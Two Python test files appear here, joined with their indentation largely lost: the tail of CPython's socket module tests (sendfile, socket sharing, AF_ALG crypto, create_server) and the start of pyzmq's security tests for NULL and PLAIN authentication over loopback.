# "blocking" Python sockets *with timeouts* are in a
# *non-blocking* mode, and 'sock.recv()' uses 'select()'
# and handles EWOULDBLOCK/EAGAIN to enforce the timeout.
self.assertTrue(s.getblocking())
else:
self.assertEqual(s.type, socket.SOCK_STREAM)
self.assertEqual(s.gettimeout(), None)
self.assertFalse(
fcntl.fcntl(s, fcntl.F_GETFL, os.O_NONBLOCK) & os.O_NONBLOCK)
self.assertTrue(s.getblocking())
@support.requires_linux_version(2, 6, 28)
def test_SOCK_NONBLOCK(self):
# a lot of it seems silly and redundant, but I wanted to test that
# changing back and forth worked ok
with socket.socket(socket.AF_INET,
socket.SOCK_STREAM | socket.SOCK_NONBLOCK) as s:
self.checkNonblock(s)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
s.setblocking(False)
self.checkNonblock(s)
s.settimeout(None)
self.checkNonblock(s, nonblock=False)
s.settimeout(2.0)
self.checkNonblock(s, timeout=2.0)
s.setblocking(True)
self.checkNonblock(s, nonblock=False)
# defaulttimeout
t = socket.getdefaulttimeout()
socket.setdefaulttimeout(0.0)
with socket.socket() as s:
self.checkNonblock(s)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(2.0)
with socket.socket() as s:
self.checkNonblock(s, timeout=2.0)
socket.setdefaulttimeout(None)
with socket.socket() as s:
self.checkNonblock(s, False)
socket.setdefaulttimeout(t)
@unittest.skipUnless(os.name == "nt", "Windows specific")
@unittest.skipUnless(multiprocessing, "need multiprocessing")
class TestSocketSharing(SocketTCPTest):
# This must be classmethod and not staticmethod or multiprocessing
# won't be able to bootstrap it.
@classmethod
def remoteProcessServer(cls, q):
# Recreate socket from shared data
sdata = q.get()
message = q.get()
s = socket.fromshare(sdata)
s2, c = s.accept()
# Send the message
s2.sendall(message)
s2.close()
s.close()
def testShare(self):
# Transfer the listening server socket to another process
# and service it from there.
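        # (A condensed sketch of this share()/fromshare() hand-off appears
        # after this class.)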
# Create process:
q = multiprocessing.Queue()
p = multiprocessing.Process(target=self.remoteProcessServer, args=(q,))
p.start()
# Get the shared socket data
data = self.serv.share(p.pid)
# Pass the shared socket to the other process
addr = self.serv.getsockname()
self.serv.close()
q.put(data)
# The data that the server will send us
message = b"slapmahfro"
q.put(message)
# Connect
s = socket.create_connection(addr)
# listen for the data
m = []
while True:
data = s.recv(100)
if not data:
break
m.append(data)
s.close()
received = b"".join(m)
self.assertEqual(received, message)
p.join()
def testShareLength(self):
data = self.serv.share(os.getpid())
self.assertRaises(ValueError, socket.fromshare, data[:-1])
self.assertRaises(ValueError, socket.fromshare, data+b"foo")
def compareSockets(self, org, other):
        # Socket sharing is expected to work only for blocking sockets,
        # since the internal Python timeout value isn't transferred.
self.assertEqual(org.gettimeout(), None)
self.assertEqual(org.gettimeout(), other.gettimeout())
self.assertEqual(org.family, other.family)
self.assertEqual(org.type, other.type)
        # If the user specified "0" for proto, then internally Windows
        # will have picked the correct value.  Python introspection on the
        # socket, however, will still return 0.  For the shared socket, the
        # Python value is recreated from the actual value, so it may not
        # compare correctly.
if org.proto != 0:
self.assertEqual(org.proto, other.proto)
def testShareLocal(self):
data = self.serv.share(os.getpid())
s = socket.fromshare(data)
try:
self.compareSockets(self.serv, s)
finally:
s.close()
def testTypes(self):
families = [socket.AF_INET, socket.AF_INET6]
types = [socket.SOCK_STREAM, socket.SOCK_DGRAM]
for f in families:
for t in types:
try:
source = socket.socket(f, t)
except OSError:
continue # This combination is not supported
try:
data = source.share(os.getpid())
shared = socket.fromshare(data)
try:
self.compareSockets(source, shared)
finally:
shared.close()
finally:
source.close()
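# A minimal, Windows-only standalone sketch (not part of the test suite) of
# the share()/fromshare() hand-off exercised by TestSocketSharing above: the
# owning process serialises a listening socket for a target pid, and that
# process rebuilds an equivalent socket object from the resulting bytes.
def _share_handoff_sketch(target_pid):
    import socket
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        listener.bind(("127.0.0.1", 0))
        listener.listen()
        shared = listener.share(target_pid)   # bytes to pass to the other process
    finally:
        listener.close()
    # In the process identified by target_pid:
    #     sock = socket.fromshare(shared)
    #     conn, addr = sock.accept()
    return shared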
class SendfileUsingSendTest(ThreadedTCPSocketTest):
"""
Test the send() implementation of socket.sendfile().
"""
FILESIZE = (10 * 1024 * 1024) # 10 MiB
BUFSIZE = 8192
FILEDATA = b""
TIMEOUT = support.LOOPBACK_TIMEOUT
@classmethod
def setUpClass(cls):
def chunks(total, step):
assert total >= step
while total > step:
yield step
total -= step
if total:
yield total
chunk = b"".join([random.choice(string.ascii_letters).encode()
for i in range(cls.BUFSIZE)])
with open(support.TESTFN, 'wb') as f:
for csize in chunks(cls.FILESIZE, cls.BUFSIZE):
f.write(chunk)
with open(support.TESTFN, 'rb') as f:
cls.FILEDATA = f.read()
assert len(cls.FILEDATA) == cls.FILESIZE
@classmethod
def tearDownClass(cls):
support.unlink(support.TESTFN)
def accept_conn(self):
self.serv.settimeout(support.LONG_TIMEOUT)
conn, addr = self.serv.accept()
conn.settimeout(self.TIMEOUT)
self.addCleanup(conn.close)
return conn
def recv_data(self, conn):
received = []
while True:
chunk = conn.recv(self.BUFSIZE)
if not chunk:
break
received.append(chunk)
return b''.join(received)
def meth_from_sock(self, sock):
# Depending on the mixin class being run return either send()
# or sendfile() method implementation.
return getattr(sock, "_sendfile_use_send")
# regular file
def _testRegularFile(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
def testRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# non regular file
def _testNonRegularFile(self):
address = self.serv.getsockname()
file = io.BytesIO(self.FILEDATA)
with socket.create_connection(address) as sock, file as file:
sent = sock.sendfile(file)
self.assertEqual(sent, self.FILESIZE)
self.assertEqual(file.tell(), self.FILESIZE)
self.assertRaises(socket._GiveupOnSendfile,
sock._sendfile_use_sendfile, file)
def testNonRegularFile(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# empty file
def _testEmptyFileSend(self):
address = self.serv.getsockname()
filename = support.TESTFN + "2"
with open(filename, 'wb'):
self.addCleanup(support.unlink, filename)
file = open(filename, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, 0)
self.assertEqual(file.tell(), 0)
def testEmptyFileSend(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(data, b"")
# offset
def _testOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
meth = self.meth_from_sock(sock)
sent = meth(file, offset=5000)
self.assertEqual(sent, self.FILESIZE - 5000)
self.assertEqual(file.tell(), self.FILESIZE)
def testOffset(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE - 5000)
self.assertEqual(data, self.FILEDATA[5000:])
# count
def _testCount(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 5000007
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCount(self):
count = 5000007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count small
def _testCountSmall(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
count = 1
meth = self.meth_from_sock(sock)
sent = meth(file, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count)
def testCountSmall(self):
count = 1
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[:count])
# count + offset
def _testCountWithOffset(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address, timeout=2) as sock, file as file:
count = 100007
meth = self.meth_from_sock(sock)
sent = meth(file, offset=2007, count=count)
self.assertEqual(sent, count)
self.assertEqual(file.tell(), count + 2007)
def testCountWithOffset(self):
count = 100007
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), count)
self.assertEqual(data, self.FILEDATA[2007:count+2007])
# non blocking sockets are not supposed to work
def _testNonBlocking(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
with socket.create_connection(address) as sock, file as file:
sock.setblocking(False)
meth = self.meth_from_sock(sock)
self.assertRaises(ValueError, meth, file)
self.assertRaises(ValueError, sock.sendfile, file)
def testNonBlocking(self):
conn = self.accept_conn()
if conn.recv(8192):
self.fail('was not supposed to receive any data')
# timeout (non-triggered)
def _testWithTimeout(self):
address = self.serv.getsockname()
file = open(support.TESTFN, 'rb')
sock = socket.create_connection(address,
timeout=support.LOOPBACK_TIMEOUT)
with sock, file:
meth = self.meth_from_sock(sock)
sent = meth(file)
self.assertEqual(sent, self.FILESIZE)
def testWithTimeout(self):
conn = self.accept_conn()
data = self.recv_data(conn)
self.assertEqual(len(data), self.FILESIZE)
self.assertEqual(data, self.FILEDATA)
# timeout (triggered)
def _testWithTimeoutTriggeredSend(self):
address = self.serv.getsockname()
with open(support.TESTFN, 'rb') as file:
with socket.create_connection(address) as sock:
sock.settimeout(0.01)
meth = self.meth_from_sock(sock)
self.assertRaises(socket.timeout, meth, file)
def testWithTimeoutTriggeredSend(self):
conn = self.accept_conn()
conn.recv(88192)
# errors
def _test_errors(self):
pass
def test_errors(self):
with open(support.TESTFN, 'rb') as file:
with socket.socket(type=socket.SOCK_DGRAM) as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "SOCK_STREAM", meth, file)
with open(support.TESTFN, 'rt') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(
ValueError, "binary mode", meth, file)
with open(support.TESTFN, 'rb') as file:
with socket.socket() as s:
meth = self.meth_from_sock(s)
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count='2')
self.assertRaisesRegex(TypeError, "positive integer",
meth, file, count=0.1)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=0)
self.assertRaisesRegex(ValueError, "positive integer",
meth, file, count=-1)
@unittest.skipUnless(hasattr(os, "sendfile"),
'os.sendfile() required for this test.')
class SendfileUsingSendfileTest(SendfileUsingSendTest):
"""
Test the sendfile() implementation of socket.sendfile().
"""
def meth_from_sock(self, sock):
return getattr(sock, "_sendfile_use_sendfile")
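# For context (a sketch, not part of the tests): socket.sendfile() itself first tries the
# os.sendfile()-based implementation exercised by the subclass above and falls back to the
# plain send() loop when that path is unavailable, roughly:
#
#     def sendfile(self, file, offset=0, count=None):
#         try:
#             return self._sendfile_use_sendfile(file, offset, count)
#         except _GiveupOnSendfile:
#             return self._sendfile_use_send(file, offset, count)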
@unittest.skipUnless(HAVE_SOCKET_ALG, 'AF_ALG required')
class LinuxKernelCryptoAPI(unittest.TestCase):
# tests for AF_ALG
def create_alg(self, typ, name):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
try:
sock.bind((typ, name))
except FileNotFoundError as e:
# type / algorithm is not available
sock.close()
raise unittest.SkipTest(str(e), typ, name)
else:
return sock
# bpo-31705: On kernel older than 4.5, sendto() failed with ENOKEY,
# at least on ppc64le architecture
@support.requires_linux_version(4, 5)
def test_sha256(self):
expected = bytes.fromhex("ba7816bf8f01cfea414140de5dae2223b00361a396"
"177a9cb410ff61f20015ad")
with self.create_alg('hash', 'sha256') as algo:
op, _ = algo.accept()
with op:
op.sendall(b"abc")
self.assertEqual(op.recv(512), expected)
op, _ = algo.accept()
with op:
op.send(b'a', socket.MSG_MORE)
op.send(b'b', socket.MSG_MORE)
op.send(b'c', socket.MSG_MORE)
op.send(b'')
self.assertEqual(op.recv(512), expected)
def test_hmac_sha1(self):
expected = bytes.fromhex("effcdf6ae5eb2fa2d27416d5f184df9c259a7c79")
with self.create_alg('hash', 'hmac(sha1)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, b"Jefe")
op, _ = algo.accept()
with op:
op.sendall(b"what do ya want for nothing?")
self.assertEqual(op.recv(512), expected)
# Although it should work with 3.19 and newer the test blocks on
# Ubuntu 15.10 with Kernel 4.2.0-19.
@support.requires_linux_version(4, 3)
def test_aes_cbc(self):
key = bytes.fromhex('06a9214036b8a15b512e03d534120006')
iv = bytes.fromhex('3dafba429d9eb430b422da802c9fac41')
msg = b"Single block msg"
ciphertext = bytes.fromhex('e353779c1079aeb82708942dbe77181a')
msglen = len(msg)
with self.create_alg('skcipher', 'cbc(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
flags=socket.MSG_MORE)
op.sendall(msg)
self.assertEqual(op.recv(msglen), ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([ciphertext],
op=socket.ALG_OP_DECRYPT, iv=iv)
self.assertEqual(op.recv(msglen), msg)
# long message
multiplier = 1024
longmsg = [msg] * multiplier
op, _ = algo.accept()
with op:
op.sendmsg_afalg(longmsg,
op=socket.ALG_OP_ENCRYPT, iv=iv)
enc = op.recv(msglen * multiplier)
self.assertEqual(len(enc), msglen * multiplier)
self.assertEqual(enc[:msglen], ciphertext)
op, _ = algo.accept()
with op:
op.sendmsg_afalg([enc],
op=socket.ALG_OP_DECRYPT, iv=iv)
dec = op.recv(msglen * multiplier)
self.assertEqual(len(dec), msglen * multiplier)
self.assertEqual(dec, msg * multiplier)
@support.requires_linux_version(4, 9) # see issue29324
def test_aead_aes_gcm(self):
key = bytes.fromhex('c939cc13397c1d37de6ae0e1cb7c423c')
iv = bytes.fromhex('b3d8cc017cbb89b39e0f67e2')
plain = bytes.fromhex('c3b3c41f113a31b73d9a5cd432103069')
assoc = bytes.fromhex('24825602bd12a984e0092d3e448eda5f')
expected_ct = bytes.fromhex('93fe7d9e9bfd10348a5606e5cafa7354')
expected_tag = bytes.fromhex('0032a1dc85f1c9786925a2e71d8272dd')
taglen = len(expected_tag)
assoclen = len(assoc)
with self.create_alg('aead', 'gcm(aes)') as algo:
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, key)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_AEAD_AUTHSIZE,
None, taglen)
# send assoc, plain and tag buffer in separate steps
op, _ = algo.accept()
with op:
op.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen, flags=socket.MSG_MORE)
op.sendall(assoc, socket.MSG_MORE)
op.sendall(plain)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# now with msg
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg_afalg([msg], op=socket.ALG_OP_ENCRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(assoclen + len(plain) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# create anc data manually
pack_uint32 = struct.Struct('I').pack
op, _ = algo.accept()
with op:
msg = assoc + plain
op.sendmsg(
[msg],
([socket.SOL_ALG, socket.ALG_SET_OP, pack_uint32(socket.ALG_OP_ENCRYPT)],
[socket.SOL_ALG, socket.ALG_SET_IV, pack_uint32(len(iv)) + iv],
[socket.SOL_ALG, socket.ALG_SET_AEAD_ASSOCLEN, pack_uint32(assoclen)],
)
)
res = op.recv(len(msg) + taglen)
self.assertEqual(expected_ct, res[assoclen:-taglen])
self.assertEqual(expected_tag, res[-taglen:])
# decrypt and verify
op, _ = algo.accept()
with op:
msg = assoc + expected_ct + expected_tag
op.sendmsg_afalg([msg], op=socket.ALG_OP_DECRYPT, iv=iv,
assoclen=assoclen)
res = op.recv(len(msg) - taglen)
self.assertEqual(plain, res[assoclen:])
@support.requires_linux_version(4, 3) # see test_aes_cbc
def test_drbg_pr_sha256(self):
# deterministic random bit generator, prediction resistance, sha256
with self.create_alg('rng', 'drbg_pr_sha256') as algo:
extra_seed = os.urandom(32)
algo.setsockopt(socket.SOL_ALG, socket.ALG_SET_KEY, extra_seed)
op, _ = algo.accept()
with op:
rn = op.recv(32)
self.assertEqual(len(rn), 32)
def test_sendmsg_afalg_args(self):
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
with sock:
with self.assertRaises(TypeError):
sock.sendmsg_afalg()
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(1)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=None)
with self.assertRaises(TypeError):
sock.sendmsg_afalg(op=socket.ALG_OP_ENCRYPT, assoclen=-1)
def test_length_restriction(self):
# bpo-35050, off-by-one error in length check
sock = socket.socket(socket.AF_ALG, socket.SOCK_SEQPACKET, 0)
self.addCleanup(sock.close)
# salg_type[14]
with self.assertRaises(FileNotFoundError):
sock.bind(("t" * 13, "name"))
with self.assertRaisesRegex(ValueError, "type too long"):
sock.bind(("t" * 14, "name"))
# salg_name[64]
with self.assertRaises(FileNotFoundError):
sock.bind(("type", "n" * 63))
with self.assertRaisesRegex(ValueError, "name too long"):
sock.bind(("type", "n" * 64))
@unittest.skipUnless(sys.platform.startswith("win"), "requires Windows")
class TestMSWindowsTCPFlags(unittest.TestCase):
knownTCPFlags = {
# available since long time ago
'TCP_MAXSEG',
'TCP_NODELAY',
# available starting with Windows 10 1607
'TCP_FASTOPEN',
# available starting with Windows 10 1703
'TCP_KEEPCNT',
# available starting with Windows 10 1709
'TCP_KEEPIDLE',
'TCP_KEEPINTVL'
}
def test_new_tcp_flags(self):
provided = [s for s in dir(socket) if s.startswith('TCP')]
unknown = [s for s in provided if s not in self.knownTCPFlags]
self.assertEqual([], unknown,
"New TCP flags were discovered. See bpo-32394 for more information")
class CreateServerTest(unittest.TestCase):
def test_address(self):
port = socket_helper.find_unused_port()
with socket.create_server(("127.0.0.1", port)) as sock:
self.assertEqual(sock.getsockname()[0], "127.0.0.1")
self.assertEqual(sock.getsockname()[1], port)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", port),
family=socket.AF_INET6) as sock:
self.assertEqual(sock.getsockname()[0], "::1")
self.assertEqual(sock.getsockname()[1], port)
def test_family_and_type(self):
with socket.create_server(("127.0.0.1", 0)) as sock:
self.assertEqual(sock.family, socket.AF_INET)
self.assertEqual(sock.type, socket.SOCK_STREAM)
if socket_helper.IPV6_ENABLED:
with socket.create_server(("::1", 0), family=socket.AF_INET6) as s:
self.assertEqual(s.family, socket.AF_INET6)
                self.assertEqual(s.type, socket.SOCK_STREAM)
def test_reuse_port(self):
if not hasattr(socket, "SO_REUSEPORT"):
with self.assertRaises(ValueError):
socket.create_server(("localhost", 0), reuse_port=True)
else:
with socket.create_server(("localhost", 0)) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertEqual(opt, 0)
with socket.create_server(("localhost", 0), reuse_port=True) as sock:
opt = sock.getsockopt(socket.SOL_SOCKET, socket.SO_REUSEPORT)
self.assertNotEqual(opt, 0)
@unittest.skipIf(not hasattr(_socket, 'IPPROTO_IPV6') or
not hasattr(_socket, 'IPV6_V6ONLY'),
"IPV6_V6ONLY option not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_ipv6_only_default(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6) as sock:
assert sock.getsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dualstack_ipv6_family(self):
with socket.create_server(("::1", 0), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.assertEqual(sock.family, socket.AF_INET6)
class CreateServerFunctionalTest(unittest.TestCase):
timeout = support.LOOPBACK_TIMEOUT
def setUp(self):
self.thread = None
def tearDown(self):
if self.thread is not None:
self.thread.join(self.timeout)
def echo_server(self, sock):
def run(sock):
with sock:
conn, _ = sock.accept()
with conn:
event.wait(self.timeout)
msg = conn.recv(1024)
if not msg:
return
conn.sendall(msg)
event = threading.Event()
sock.settimeout(self.timeout)
self.thread = threading.Thread(target=run, args=(sock, ))
self.thread.start()
event.set()
def echo_client(self, addr, family):
with socket.socket(family=family) as sock:
sock.settimeout(self.timeout)
sock.connect(addr)
sock.sendall(b'foo')
self.assertEqual(sock.recv(1024), b'foo')
def test_tcp4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port)) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_tcp6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port),
family=socket.AF_INET6) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
# --- dual stack tests
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v4(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("127.0.0.1", port), socket.AF_INET)
@unittest.skipIf(not socket.has_dualstack_ipv6(),
"dualstack_ipv6 not supported")
@unittest.skipUnless(socket_helper.IPV6_ENABLED, 'IPv6 required for this test')
def test_dual_stack_client_v6(self):
port = socket_helper.find_unused_port()
with socket.create_server(("", port), family=socket.AF_INET6,
dualstack_ipv6=True) as sock:
self.echo_server(sock)
self.echo_client(("::1", port), socket.AF_INET6)
@requireAttrs(socket, "send_fds")
@requireAttrs(socket, "recv_fds")
@requireAttrs(socket, "AF_UNIX")
class SendRecvFdsTests(unittest.TestCase):
def testSendAndRecvFds(self):
def close_pipes(pipes):
for fd1, fd2 in pipes:
os.close(fd1)
os.close(fd2)
def close_fds(fds):
for fd in fds:
os.close(fd)
# send 10 file descriptors
pipes = [os.pipe() for _ in range(10)]
self.addCleanup(close_pipes, pipes)
fds = [rfd for rfd, wfd in pipes]
# use a UNIX socket pair to exchange file descriptors locally
sock1, sock2 = socket.socketpair(socket.AF_UNIX, socket.SOCK_STREAM)
with sock1, sock2:
socket.send_fds(sock1, [MSG], fds)
# request more data and file descriptors than expected
msg, fds2, flags, addr = socket.recv_fds(sock2, len(MSG) * 2, len(fds) * 2)
self.addCleanup(close_fds, fds2)
self.assertEqual(msg, MSG)
self.assertEqual(len(fds2), len(fds))
self.assertEqual(flags, 0)
# don't test addr
# test that file descriptors are connected
for index, fds in enumerate(pipes):
rfd, wfd = fds
os.write(wfd, str(index).encode())
for index, rfd in enumerate(fds2):
data = os.read(rfd, 100)
self.assertEqual(data, str(index).encode())
def test_main():
tests = [GeneralModuleTests, BasicTCPTest, TCPCloserTest, TCPTimeoutTest,
TestExceptions, BufferIOTest, BasicTCPTest2, BasicUDPTest,
UDPTimeoutTest, CreateServerTest, CreateServerFunctionalTest,
SendRecvFdsTests]
tests.extend([
NonBlockingTCPTests,
FileObjectClassTestCase,
UnbufferedFileObjectClassTestCase,
LineBufferedFileObjectClassTestCase,
SmallBufferedFileObjectClassTestCase,
UnicodeReadFileObjectClassTestCase,
UnicodeWriteFileObjectClassTestCase,
UnicodeReadWriteFileObjectClassTestCase,
NetworkConnectionNoServer,
NetworkConnectionAttributesTest,
NetworkConnectionBehaviourTest,
ContextManagersTest,
InheritanceTest,
NonblockConstantTest
])
tests.append(BasicSocketPairTest)
tests.append(TestUnixDomain)
tests.append(TestLinuxAbstractNamespace)
tests.extend([TIPCTest, TIPCThreadableTest])
tests.extend([BasicCANTest, CANTest])
tests.extend([BasicRDSTest, RDSTest])
tests.append(LinuxKernelCryptoAPI)
tests.append(BasicQIPCRTRTest)
tests.extend([
BasicVSOCKTest,
ThreadedVSOCKSocketStreamTest,
])
tests.append(BasicBluetoothTest)
tests.extend([
CmsgMacroTests,
SendmsgUDPTest,
RecvmsgUDPTest,
RecvmsgIntoUDPTest,
SendmsgUDP6Test,
RecvmsgUDP6Test,
RecvmsgRFC3542AncillaryUDP6Test,
RecvmsgIntoRFC3542AncillaryUDP6Test,
RecvmsgIntoUDP6Test,
SendmsgUDPLITETest,
RecvmsgUDPLITETest,
RecvmsgIntoUDPLITETest,
SendmsgUDPLITE6Test,
RecvmsgUDPLITE6Test,
RecvmsgRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoRFC3542AncillaryUDPLITE6Test,
RecvmsgIntoUDPLITE6Test,
SendmsgTCPTest,
RecvmsgTCPTest,
RecvmsgIntoTCPTest,
SendmsgSCTPStreamTest,
RecvmsgSCTPStreamTest,
RecvmsgIntoSCTPStreamTest,
SendmsgUnixStreamTest,
RecvmsgUnixStreamTest,
RecvmsgIntoUnixStreamTest,
RecvmsgSCMRightsStreamTest,
RecvmsgIntoSCMRightsStreamTest,
# These are slow when setitimer() is not available
InterruptedRecvTimeoutTest,
InterruptedSendTimeoutTest,
TestSocketSharing,
SendfileUsingSendTest,
SendfileUsingSendfileTest,
])
tests.append(TestMSWindowsTCPFlags)
thread_info = support.threading_setup()
support.run_unittest(*tests)
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
test_security.py
|
"""Test libzmq security (libzmq >= 3.3.0)"""
# -*- coding: utf8 -*-
# Copyright (C) PyZMQ Developers
# Distributed under the terms of the Modified BSD License.
import os
import contextlib
import time
from threading import Thread
import zmq
from zmq.tests import (
BaseZMQTestCase, SkipTest, PYPY
)
from zmq.utils import z85
USER = b"admin"
PASS = b"password"
class TestSecurity(BaseZMQTestCase):
def setUp(self):
if zmq.zmq_version_info() < (4,0):
raise SkipTest("security is new in libzmq 4.0")
try:
zmq.curve_keypair()
except zmq.ZMQError:
raise SkipTest("security requires libzmq to be built with CURVE support")
super(TestSecurity, self).setUp()
def zap_handler(self):
socket = self.context.socket(zmq.REP)
socket.bind("inproc://zeromq.zap.01")
try:
msg = self.recv_multipart(socket)
version, sequence, domain, address, identity, mechanism = msg[:6]
if mechanism == b'PLAIN':
username, password = msg[6:]
elif mechanism == b'CURVE':
key = msg[6]
self.assertEqual(version, b"1.0")
self.assertEqual(identity, b"IDENT")
reply = [version, sequence]
if mechanism == b'CURVE' or \
(mechanism == b'PLAIN' and username == USER and password == PASS) or \
(mechanism == b'NULL'):
reply.extend([
b"200",
b"OK",
b"anonymous",
b"\5Hello\0\0\0\5World",
])
else:
reply.extend([
b"400",
b"Invalid username or password",
b"",
b"",
])
socket.send_multipart(reply)
finally:
socket.close()
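    # For reference (paraphrasing the ZAP protocol this handler implements): a ZAP request
    # carries [version, sequence, domain, address, identity, mechanism, credentials...],
    # where the credentials are username+password for PLAIN and the client public key for
    # CURVE; the reply sent above is [version, sequence, status_code, status_text,
    # user_id, metadata].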
@contextlib.contextmanager
def zap(self):
self.start_zap()
time.sleep(0.5) # allow time for the Thread to start
try:
yield
finally:
self.stop_zap()
def start_zap(self):
self.zap_thread = Thread(target=self.zap_handler)
self.zap_thread.start()
def stop_zap(self):
self.zap_thread.join()
def bounce(self, server, client, test_metadata=True):
msg = [os.urandom(64), os.urandom(64)]
client.send_multipart(msg)
frames = self.recv_multipart(server, copy=False)
recvd = list(map(lambda x: x.bytes, frames))
try:
if test_metadata and not PYPY:
for frame in frames:
self.assertEqual(frame.get('User-Id'), 'anonymous')
self.assertEqual(frame.get('Hello'), 'World')
self.assertEqual(frame['Socket-Type'], 'DEALER')
except zmq.ZMQVersionError:
pass
self.assertEqual(recvd, msg)
server.send_multipart(recvd)
msg2 = self.recv_multipart(client)
self.assertEqual(msg2, msg)
def test_null(self):
"""test NULL (default) security"""
server = self.socket(zmq.DEALER)
client = self.socket(zmq.DEALER)
self.assertEqual(client.MECHANISM, zmq.NULL)
self.assertEqual(server.mechanism, zmq.NULL)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client, False)
def test_plain(self):
"""test PLAIN authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.assertEqual(client.plain_username, b'')
self.assertEqual(client.plain_password, b'')
client.plain_username = USER
client.plain_password = PASS
self.assertEqual(client.getsockopt(zmq.PLAIN_USERNAME), USER)
self.assertEqual(client.getsockopt(zmq.PLAIN_PASSWORD), PASS)
self.assertEqual(client.plain_server, 0)
self.assertEqual(server.plain_server, 0)
server.plain_server = True
self.assertEqual(server.mechanism, zmq.PLAIN)
self.assertEqual(client.mechanism, zmq.PLAIN)
assert not client.plain_server
assert server.plain_server
with self.zap():
iface = 'tcp://127.0.0.1'
port = server.bind_to_random_port(iface)
client.connect("%s:%i" % (iface, port))
self.bounce(server, client)
def skip_plain_inauth(self):
"""test PLAIN failed authentication"""
server = self.socket(zmq.DEALER)
server.identity = b'IDENT'
client = self.socket(zmq.DEALER)
self.sockets.extend([server, client])
client.plain_username = USER
client.plain_password = b'incorrect'
server.plain_server = True
